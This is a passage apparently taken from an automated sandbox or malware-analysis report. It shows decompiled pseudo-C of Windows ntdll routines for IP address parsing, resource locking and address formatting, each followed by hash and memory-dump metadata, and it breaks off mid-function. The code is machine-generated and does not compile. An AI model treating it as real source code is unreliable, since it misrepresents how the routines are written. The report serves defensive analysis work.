                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02303F4A
                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02303EC4
                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 0230E345
                                    • Execute=1, xrefs: 02303F5E
                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0230E2FB
                                    • ExecuteOptions, xrefs: 02303F04
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    Similarity
                                    • API ID: BaseDataModuleQuery
                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                    • API String ID: 3901378454-484625025
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E022F0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                    				signed int _v8;
                                    				signed int _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				signed int _v24;
                                    				signed int _v28;
                                    				signed int _v32;
                                    				void* _t108;
                                    				void* _t116;
                                    				char _t120;
                                    				short _t121;
                                    				void* _t128;
                                    				intOrPtr* _t130;
                                    				char _t132;
                                    				short _t133;
                                    				intOrPtr _t141;
                                    				signed int _t156;
                                    				signed int _t174;
                                    				intOrPtr _t177;
                                    				intOrPtr* _t179;
                                    				intOrPtr _t180;
                                    				void* _t183;
                                    
                                    				_t179 = _a4;
                                    				_t141 =  *_t179;
                                    				_v16 = 0;
                                    				_v28 = 0;
                                    				_v8 = 0;
                                    				_v24 = 0;
                                    				_v12 = 0;
                                    				_v32 = 0;
                                    				_v20 = 0;
                                    				if(_t141 == 0) {
                                    					L41:
                                    					 *_a8 = _t179;
                                    					_t180 = _v24;
                                    					if(_t180 != 0) {
                                    						if(_t180 != 3) {
                                    							goto L6;
                                    						}
                                    						_v8 = _v8 + 1;
                                    					}
                                    					_t174 = _v32;
                                    					if(_t174 == 0) {
                                    						if(_v8 == 7) {
                                    							goto L43;
                                    						}
                                    						goto L6;
                                    					}
                                    					L43:
                                    					if(_v16 != 1) {
                                    						if(_v16 != 2) {
                                    							goto L6;
                                    						}
                                    						 *((short*)(_a12 + _v20 * 2)) = 0;
                                    						L47:
                                    						if(_t174 != 0) {
                                    							E022C8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                    							_t116 = 8;
                                    							E022BDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                    						}
                                    						return 0;
                                    					}
                                    					if(_t180 != 0) {
                                    						if(_v12 > 3) {
                                    							goto L6;
                                    						}
                                    						_t120 = E022F0CFA(_v28, 0, 0xa);
                                    						_t183 = _t183 + 0xc;
                                    						if(_t120 > 0xff) {
                                    							goto L6;
                                    						}
                                    						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                    						goto L47;
                                    					}
                                    					if(_v12 > 4) {
                                    						goto L6;
                                    					}
                                    					_t121 = E022F0CFA(_v28, _t180, 0x10);
                                    					_t183 = _t183 + 0xc;
                                    					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                    					goto L47;
                                    				} else {
                                    					while(1) {
                                    						_t123 = _v16;
                                    						if(_t123 == 0) {
                                    							goto L7;
                                    						}
                                    						_t108 = _t123 - 1;
                                    						if(_t108 != 0) {
                                    							goto L1;
                                    						}
                                    						_t178 = _t141;
                                    						if(E022F06BA(_t108, _t141) == 0 || _t135 == 0) {
                                    							if(E022F06BA(_t135, _t178) == 0 || E022F0A5B(_t136, _t178) == 0) {
                                    								if(_t141 != 0x3a) {
                                    									if(_t141 == 0x2e) {
                                    										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                    											goto L41;
                                    										} else {
                                    											_v24 = _v24 + 1;
                                    											L27:
                                    											_v16 = _v16 & 0x00000000;
                                    											L28:
                                    											if(_v28 == 0) {
                                    												goto L20;
                                    											}
                                    											_t177 = _v24;
                                    											if(_t177 != 0) {
                                    												if(_v12 > 3) {
                                    													L6:
                                    													return 0xc000000d;
                                    												}
                                    												_t132 = E022F0CFA(_v28, 0, 0xa);
                                    												_t183 = _t183 + 0xc;
                                    												if(_t132 > 0xff) {
                                    													goto L6;
                                    												}
                                    												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                    												goto L20;
                                    											}
                                    											if(_v12 > 4) {
                                    												goto L6;
                                    											}
                                    											_t133 = E022F0CFA(_v28, 0, 0x10);
                                    											_t183 = _t183 + 0xc;
                                    											_v20 = _v20 + 1;
                                    											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                    											goto L20;
                                    										}
                                    									}
                                    									goto L41;
                                    								}
                                    								if(_v24 > 0 || _v8 > 6) {
                                    									goto L41;
                                    								} else {
                                    									_t130 = _t179 + 1;
                                    									if( *_t130 == _t141) {
                                    										if(_v32 != 0) {
                                    											goto L41;
                                    										}
                                    										_v32 = _v8 + 1;
                                    										_t156 = 2;
                                    										_v8 = _v8 + _t156;
                                    										L34:
                                    										_t179 = _t130;
                                    										_v16 = _t156;
                                    										goto L28;
                                    									}
                                    									_v8 = _v8 + 1;
                                    									goto L27;
                                    								}
                                    							} else {
                                    								_v12 = _v12 + 1;
                                    								if(_v24 > 0) {
                                    									goto L41;
                                    								}
                                    								_a7 = 1;
                                    								goto L20;
                                    							}
                                    						} else {
                                    							_v12 = _v12 + 1;
                                    							L20:
                                    							_t179 = _t179 + 1;
                                    							_t141 =  *_t179;
                                    							if(_t141 == 0) {
                                    								goto L41;
                                    							}
                                    							continue;
                                    						}
                                    						L7:
                                    						if(_t141 == 0x3a) {
                                    							if(_v24 > 0 || _v8 > 0) {
                                    								goto L41;
                                    							} else {
                                    								_t130 = _t179 + 1;
                                    								if( *_t130 != _t141) {
                                    									goto L41;
                                    								}
                                    								_v20 = _v20 + 1;
                                    								_t156 = 2;
                                    								_v32 = 1;
                                    								_v8 = _t156;
                                    								 *((short*)(_a12 + _v20 * 2)) = 0;
                                    								goto L34;
                                    							}
                                    						}
                                    						L8:
                                    						if(_v8 > 7) {
                                    							goto L41;
                                    						}
                                    						_t142 = _t141;
                                    						if(E022F06BA(_t123, _t141) == 0 || _t124 == 0) {
                                    							if(E022F06BA(_t124, _t142) == 0 || E022F0A5B(_t125, _t142) == 0 || _v24 > 0) {
                                    								goto L41;
                                    							} else {
                                    								_t128 = 1;
                                    								_a7 = 1;
                                    								_v28 = _t179;
                                    								_v16 = 1;
                                    								_v12 = 1;
                                    								L39:
                                    								if(_v16 == _t128) {
                                    									goto L20;
                                    								}
                                    								goto L28;
                                    							}
                                    						} else {
                                    							_a7 = 0;
                                    							_v28 = _t179;
                                    							_v16 = 1;
                                    							_v12 = 1;
                                    							goto L20;
                                    						}
                                    					}
                                    				}
                                    				L1:
                                    				_t123 = _t108 == 1;
                                    				if(_t108 == 1) {
                                    					goto L8;
                                    				}
                                    				_t128 = 1;
                                    				goto L39;
                                    			}


























                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    • Associated: 00000007.00000002.2378253920.0000000002290000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378345340.0000000002380000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378351184.0000000002390000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378357251.0000000002394000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378363645.0000000002397000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378369400.00000000023A0000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378402410.0000000002400000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: __fassign
                                    • String ID: .$:$:
                                    • API String ID: 3965848254-2308638275
                                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                    • Instruction ID: 20d9d27ebc41b10fa5badad31fea08d39259fbf59e69a011a36e67e2d4a1613a
                                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                    • Instruction Fuzzy Hash: 79A19C71D2030ADADFA4CFE4C8446AEF7B5AF04308F24847ADA06A728ED7749B45CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 49%
                                    			E022F0554(signed int _a4, char _a8) {
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int* _t49;
                                    				signed int _t51;
                                    				signed int _t56;
                                    				signed int _t58;
                                    				signed int _t61;
                                    				signed int _t63;
                                    				void* _t66;
                                    				intOrPtr _t67;
                                    				signed int _t70;
                                    				void* _t75;
                                    				signed int _t81;
                                    				signed int _t84;
                                    				void* _t86;
                                    				signed int _t93;
                                    				signed int _t96;
                                    				intOrPtr _t105;
                                    				signed int _t107;
                                    				void* _t110;
                                    				signed int _t115;
                                    				signed int* _t119;
                                    				void* _t125;
                                    				void* _t126;
                                    				signed int _t128;
                                    				signed int _t130;
                                    				signed int _t138;
                                    				signed int _t144;
                                    				void* _t158;
                                    				void* _t159;
                                    				void* _t160;
                                    
                                    				_t96 = _a4;
                                    				_t115 =  *(_t96 + 0x28);
                                    				_push(_t138);
                                    				if(_t115 < 0) {
                                    					_t105 =  *[fs:0x18];
                                    					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                    					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                    						goto L6;
                                    					} else {
                                    						__eflags = _t115 | 0xffffffff;
                                    						asm("lock xadd [eax], edx");
                                    						return 1;
                                    					}
                                    				} else {
                                    					L6:
                                    					_push(_t128);
                                    					while(1) {
                                    						L7:
                                    						__eflags = _t115;
                                    						if(_t115 >= 0) {
                                    							break;
                                    						}
                                    						__eflags = _a8;
                                    						if(_a8 == 0) {
                                    							__eflags = 0;
                                    							return 0;
                                    						} else {
                                    							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                    							_t49 = _t96 + 0x1c;
                                    							_t106 = 1;
                                    							asm("lock xadd [edx], ecx");
                                    							_t115 =  *(_t96 + 0x28);
                                    							__eflags = _t115;
                                    							if(_t115 < 0) {
                                    								L23:
                                    								_t130 = 0;
                                    								__eflags = 0;
                                    								while(1) {
                                    									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                    									asm("sbb esi, esi");
                                    									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x023901c0;
                                    									_push(_t144);
                                    									_push(0);
                                    									_t51 = E022AF8CC( *((intOrPtr*)(_t96 + 0x18)));
                                    									__eflags = _t51 - 0x102;
                                    									if(_t51 != 0x102) {
                                    										break;
                                    									}
                                    									_t106 =  *(_t144 + 4);
                                    									_t126 =  *_t144;
                                    									_t86 = E022F4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                    									_push(_t126);
                                    									_push(_t86);
                                    									E02303F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                    									E02303F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                    									_t130 = _t130 + 1;
                                    									_t160 = _t158 + 0x28;
                                    									__eflags = _t130 - 2;
                                    									if(__eflags > 0) {
                                    										E0233217A(_t106, __eflags, _t96);
                                    									}
                                    									_push("RTL: Re-Waiting\n");
                                    									_push(0);
                                    									_push(0x65);
                                    									E02303F92();
                                    									_t158 = _t160 + 0xc;
                                    								}
                                    								__eflags = _t51;
                                    								if(__eflags < 0) {
                                    									_push(_t51);
                                    									E022F3915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                    									asm("int3");
                                    									while(1) {
                                    										L32:
                                    										__eflags = _a8;
                                    										if(_a8 == 0) {
                                    											break;
                                    										}
                                    										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                    										_t119 = _t96 + 0x24;
                                    										_t107 = 1;
                                    										asm("lock xadd [eax], ecx");
                                    										_t56 =  *(_t96 + 0x28);
                                    										_a4 = _t56;
                                    										__eflags = _t56;
                                    										if(_t56 != 0) {
                                    											L40:
                                    											_t128 = 0;
                                    											__eflags = 0;
                                    											while(1) {
                                    												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                    												asm("sbb esi, esi");
                                    												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x023901c0;
                                    												_push(_t138);
                                    												_push(0);
                                    												_t58 = E022AF8CC( *((intOrPtr*)(_t96 + 0x20)));
                                    												__eflags = _t58 - 0x102;
                                    												if(_t58 != 0x102) {
                                    													break;
                                    												}
                                    												_t107 =  *(_t138 + 4);
                                    												_t125 =  *_t138;
                                    												_t75 = E022F4FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                    												_push(_t125);
                                    												_push(_t75);
                                    												E02303F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                    												E02303F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                    												_t128 = _t128 + 1;
                                    												_t159 = _t158 + 0x28;
                                    												__eflags = _t128 - 2;
                                    												if(__eflags > 0) {
                                    													E0233217A(_t107, __eflags, _t96);
                                    												}
                                    												_push("RTL: Re-Waiting\n");
                                    												_push(0);
                                    												_push(0x65);
                                    												E02303F92();
                                    												_t158 = _t159 + 0xc;
                                    											}
                                    											__eflags = _t58;
                                    											if(__eflags < 0) {
                                    												_push(_t58);
                                    												E022F3915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                    												asm("int3");
                                    												_t61 =  *_t107;
                                    												 *_t107 = 0;
                                    												__eflags = _t61;
                                    												if(_t61 == 0) {
                                    													L1:
                                    													_t63 = E022D5384(_t138 + 0x24);
                                    													if(_t63 != 0) {
                                    														goto L52;
                                    													} else {
                                    														goto L2;
                                    													}
                                    												} else {
                                    													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                    													_push( &_a4);
                                    													_push(_t61);
                                    													_t70 = E022AF970( *((intOrPtr*)(_t138 + 0x18)));
                                    													__eflags = _t70;
                                    													if(__eflags >= 0) {
                                    														goto L1;
                                    													} else {
                                    														_push(_t70);
                                    														E022F3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                    														L52:
                                    														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                    														_push( &_a4);
                                    														_push(1);
                                    														_t63 = E022AF970( *((intOrPtr*)(_t138 + 0x20)));
                                    														__eflags = _t63;
                                    														if(__eflags >= 0) {
                                    															L2:
                                    															return _t63;
                                    														} else {
                                    															_push(_t63);
                                    															E022F3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                    															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                    															_push( &_a4);
                                    															_push(1);
                                    															_t63 = E022AF970( *((intOrPtr*)(_t138 + 0x20)));
                                    															__eflags = _t63;
                                    															if(__eflags >= 0) {
                                    																goto L2;
                                    															} else {
                                    																_push(_t63);
                                    																_t66 = E022F3915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                    																asm("int3");
                                    																while(1) {
                                    																	_t110 = _t66;
                                    																	__eflags = _t66 - 1;
                                    																	if(_t66 != 1) {
                                    																		break;
                                    																	}
                                    																	_t128 = _t128 | 0xffffffff;
                                    																	_t66 = _t110;
                                    																	asm("lock cmpxchg [ebx], edi");
                                    																	__eflags = _t66 - _t110;
                                    																	if(_t66 != _t110) {
                                    																		continue;
                                    																	} else {
                                    																		_t67 =  *[fs:0x18];
                                    																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                    																		return _t67;
                                    																	}
                                    																	goto L58;
                                    																}
                                    																E022D5329(_t110, _t138);
                                    																return E022D53A5(_t138, 1);
                                    															}
                                    														}
                                    													}
                                    												}
                                    											} else {
                                    												_t56 =  *(_t96 + 0x28);
                                    												goto L3;
                                    											}
                                    										} else {
                                    											_t107 =  *_t119;
                                    											__eflags = _t107;
                                    											if(__eflags > 0) {
                                    												while(1) {
                                    													_t81 = _t107;
                                    													asm("lock cmpxchg [edi], esi");
                                    													__eflags = _t81 - _t107;
                                    													if(_t81 == _t107) {
                                    														break;
                                    													}
                                    													_t107 = _t81;
                                    													__eflags = _t81;
                                    													if(_t81 > 0) {
                                    														continue;
                                    													}
                                    													break;
                                    												}
                                    												_t56 = _a4;
                                    												__eflags = _t107;
                                    											}
                                    											if(__eflags != 0) {
                                    												while(1) {
                                    													L3:
                                    													__eflags = _t56;
                                    													if(_t56 != 0) {
                                    														goto L32;
                                    													}
                                    													_t107 = _t107 | 0xffffffff;
                                    													_t56 = 0;
                                    													asm("lock cmpxchg [edx], ecx");
                                    													__eflags = 0;
                                    													if(0 != 0) {
                                    														continue;
                                    													} else {
                                    														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                    														return 1;
                                    													}
                                    													goto L58;
                                    												}
                                    												continue;
                                    											} else {
                                    												goto L40;
                                    											}
                                    										}
                                    										goto L58;
                                    									}
                                    									__eflags = 0;
                                    									return 0;
                                    								} else {
                                    									_t115 =  *(_t96 + 0x28);
                                    									continue;
                                    								}
                                    							} else {
                                    								_t106 =  *_t49;
                                    								__eflags = _t106;
                                    								if(__eflags > 0) {
                                    									while(1) {
                                    										_t93 = _t106;
                                    										asm("lock cmpxchg [edi], esi");
                                    										__eflags = _t93 - _t106;
                                    										if(_t93 == _t106) {
                                    											break;
                                    										}
                                    										_t106 = _t93;
                                    										__eflags = _t93;
                                    										if(_t93 > 0) {
                                    											continue;
                                    										}
                                    										break;
                                    									}
                                    									__eflags = _t106;
                                    								}
                                    								if(__eflags != 0) {
                                    									continue;
                                    								} else {
                                    									goto L23;
                                    								}
                                    							}
                                    						}
                                    						goto L58;
                                    					}
                                    					_t84 = _t115;
                                    					asm("lock cmpxchg [esi], ecx");
                                    					__eflags = _t84 - _t115;
                                    					if(_t84 != _t115) {
                                    						_t115 = _t84;
                                    						goto L7;
                                    					} else {
                                    						return 1;
                                    					}
                                    				}
                                    				L58:
                                    			}




































                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02312206
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    • Associated: 00000007.00000002.2378253920.0000000002290000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378345340.0000000002380000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378351184.0000000002390000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378357251.0000000002394000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378363645.0000000002397000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378369400.00000000023A0000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378402410.0000000002400000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                    • API String ID: 885266447-4236105082
                                    • Opcode ID: 85d1611344de3a55a6354f9a3968a050f4a0527848160f77f5b5ba1926949159
                                    • Instruction ID: 2b6723b776fdca9047302124834a4019cf36e4da18d1348ee5d0998a53c304a1
                                    • Opcode Fuzzy Hash: 85d1611344de3a55a6354f9a3968a050f4a0527848160f77f5b5ba1926949159
                                    • Instruction Fuzzy Hash: 56514C317103116FEB69DA58CCC1FA773AAAF88710F214269FD45DB289DA71EC42CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 64%
                                    			E022F14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                    				signed int _v8;
                                    				char _v10;
                                    				char _v140;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t24;
                                    				void* _t26;
                                    				signed int _t29;
                                    				signed int _t34;
                                    				signed int _t40;
                                    				intOrPtr _t45;
                                    				void* _t51;
                                    				intOrPtr* _t52;
                                    				void* _t54;
                                    				signed int _t57;
                                    				void* _t58;
                                    
                                    				_t51 = __edx;
                                    				_t24 =  *0x2392088; // 0x777da72f
                                    				_v8 = _t24 ^ _t57;
                                    				_t45 = _a16;
                                    				_t53 = _a4;
                                    				_t52 = _a20;
                                    				if(_a4 == 0 || _t52 == 0) {
                                    					L10:
                                    					_t26 = 0xc000000d;
                                    				} else {
                                    					if(_t45 == 0) {
                                    						if( *_t52 == _t45) {
                                    							goto L3;
                                    						} else {
                                    							goto L10;
                                    						}
                                    					} else {
                                    						L3:
                                    						_t28 =  &_v140;
                                    						if(_a12 != 0) {
                                    							_push("[");
                                    							_push(0x41);
                                    							_push( &_v140);
                                    							_t29 = E022E7707();
                                    							_t58 = _t58 + 0xc;
                                    							_t28 = _t57 + _t29 * 2 - 0x88;
                                    						}
                                    						_t54 = E022F13CB(_t53, _t28);
                                    						if(_a8 != 0) {
                                    							_t34 = E022E7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                    							_t58 = _t58 + 0x10;
                                    							_t54 = _t54 + _t34 * 2;
                                    						}
                                    						if(_a12 != 0) {
                                    							_t40 = E022E7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                    							_t58 = _t58 + 0x10;
                                    							_t54 = _t54 + _t40 * 2;
                                    						}
                                    						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                    						 *_t52 = _t53;
                                    						if( *_t52 < _t53) {
                                    							goto L10;
                                    						} else {
                                    							E022B2340(_t45,  &_v140, _t53 + _t53);
                                    							_t26 = 0;
                                    						}
                                    					}
                                    				}
                                    				return E022BE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                    			}





















                                    APIs
                                    • ___swprintf_l.LIBCMT ref: 0231EA22
                                      • Part of subcall function 022F13CB: ___swprintf_l.LIBCMT ref: 022F146B
                                      • Part of subcall function 022F13CB: ___swprintf_l.LIBCMT ref: 022F1490
                                    • ___swprintf_l.LIBCMT ref: 022F156D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    • Associated: 00000007.00000002.2378253920.0000000002290000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378345340.0000000002380000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378351184.0000000002390000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378357251.0000000002394000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378363645.0000000002397000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378369400.00000000023A0000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378402410.0000000002400000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: ___swprintf_l
                                    • String ID: %%%u$]:%u
                                    • API String ID: 48624451-3050659472
                                    • Opcode ID: a69d636a76d4bcba3aa7ebcf0f5bb6285c78867fa3d693a668c8472ba64a1c27
                                    • Instruction ID: 034a2825ba76def1e86ddb502db896597d5ca2fb355766df7f6821a654e42c5a
                                    • Opcode Fuzzy Hash: a69d636a76d4bcba3aa7ebcf0f5bb6285c78867fa3d693a668c8472ba64a1c27
                                    • Instruction Fuzzy Hash: 9221C572920219DBDF61DED4CC41AEEB3ACAF10704F844125EE4AE3148DB71AA688BD1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 44%
                                    			E022D53A5(signed int _a4, char _a8) {
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t32;
                                    				signed int _t37;
                                    				signed int _t40;
                                    				signed int _t42;
                                    				void* _t45;
                                    				intOrPtr _t46;
                                    				signed int _t49;
                                    				void* _t51;
                                    				signed int _t57;
                                    				signed int _t64;
                                    				signed int _t71;
                                    				void* _t74;
                                    				intOrPtr _t78;
                                    				signed int* _t79;
                                    				void* _t85;
                                    				signed int _t86;
                                    				signed int _t92;
                                    				void* _t104;
                                    				void* _t105;
                                    
                                    				_t64 = _a4;
                                    				_t32 =  *(_t64 + 0x28);
                                    				_t71 = _t64 + 0x28;
                                    				_push(_t92);
                                    				if(_t32 < 0) {
                                    					_t78 =  *[fs:0x18];
                                    					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                    					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                    						goto L3;
                                    					} else {
                                    						__eflags = _t32 | 0xffffffff;
                                    						asm("lock xadd [ecx], eax");
                                    						return 1;
                                    					}
                                    				} else {
                                    					L3:
                                    					_push(_t86);
                                    					while(1) {
                                    						L4:
                                    						__eflags = _t32;
                                    						if(_t32 == 0) {
                                    							break;
                                    						}
                                    						__eflags = _a8;
                                    						if(_a8 == 0) {
                                    							__eflags = 0;
                                    							return 0;
                                    						} else {
                                    							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                    							_t79 = _t64 + 0x24;
                                    							_t71 = 1;
                                    							asm("lock xadd [eax], ecx");
                                    							_t32 =  *(_t64 + 0x28);
                                    							_a4 = _t32;
                                    							__eflags = _t32;
                                    							if(_t32 != 0) {
                                    								L19:
                                    								_t86 = 0;
                                    								__eflags = 0;
                                    								while(1) {
                                    									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                    									asm("sbb esi, esi");
                                    									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x023901c0;
                                    									_push(_t92);
                                    									_push(0);
                                    									_t37 = E022AF8CC( *((intOrPtr*)(_t64 + 0x20)));
                                    									__eflags = _t37 - 0x102;
                                    									if(_t37 != 0x102) {
                                    										break;
                                    									}
                                    									_t71 =  *(_t92 + 4);
                                    									_t85 =  *_t92;
                                    									_t51 = E022F4FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                    									_push(_t85);
                                    									_push(_t51);
                                    									E02303F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                    									E02303F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                    									_t86 = _t86 + 1;
                                    									_t105 = _t104 + 0x28;
                                    									__eflags = _t86 - 2;
                                    									if(__eflags > 0) {
                                    										E0233217A(_t71, __eflags, _t64);
                                    									}
                                    									_push("RTL: Re-Waiting\n");
                                    									_push(0);
                                    									_push(0x65);
                                    									E02303F92();
                                    									_t104 = _t105 + 0xc;
                                    								}
                                    								__eflags = _t37;
                                    								if(__eflags < 0) {
                                    									_push(_t37);
                                    									E022F3915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                    									asm("int3");
                                    									_t40 =  *_t71;
                                    									 *_t71 = 0;
                                    									__eflags = _t40;
                                    									if(_t40 == 0) {
                                    										L1:
                                    										_t42 = E022D5384(_t92 + 0x24);
                                    										if(_t42 != 0) {
                                    											goto L31;
                                    										} else {
                                    											goto L2;
                                    										}
                                    									} else {
                                    										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                    										_push( &_a4);
                                    										_push(_t40);
                                    										_t49 = E022AF970( *((intOrPtr*)(_t92 + 0x18)));
                                    										__eflags = _t49;
                                    										if(__eflags >= 0) {
                                    											goto L1;
                                    										} else {
                                    											_push(_t49);
                                    											E022F3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                    											L31:
                                    											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                    											_push( &_a4);
                                    											_push(1);
                                    											_t42 = E022AF970( *((intOrPtr*)(_t92 + 0x20)));
                                    											__eflags = _t42;
                                    											if(__eflags >= 0) {
                                    												L2:
                                    												return _t42;
                                    											} else {
                                    												_push(_t42);
                                    												E022F3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                    												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                    												_push( &_a4);
                                    												_push(1);
                                    												_t42 = E022AF970( *((intOrPtr*)(_t92 + 0x20)));
                                    												__eflags = _t42;
                                    												if(__eflags >= 0) {
                                    													goto L2;
                                    												} else {
                                    													_push(_t42);
                                    													_t45 = E022F3915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                    													asm("int3");
                                    													while(1) {
                                    														_t74 = _t45;
                                    														__eflags = _t45 - 1;
                                    														if(_t45 != 1) {
                                    															break;
                                    														}
                                    														_t86 = _t86 | 0xffffffff;
                                    														_t45 = _t74;
                                    														asm("lock cmpxchg [ebx], edi");
                                    														__eflags = _t45 - _t74;
                                    														if(_t45 != _t74) {
                                    															continue;
                                    														} else {
                                    															_t46 =  *[fs:0x18];
                                    															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                    															return _t46;
                                    														}
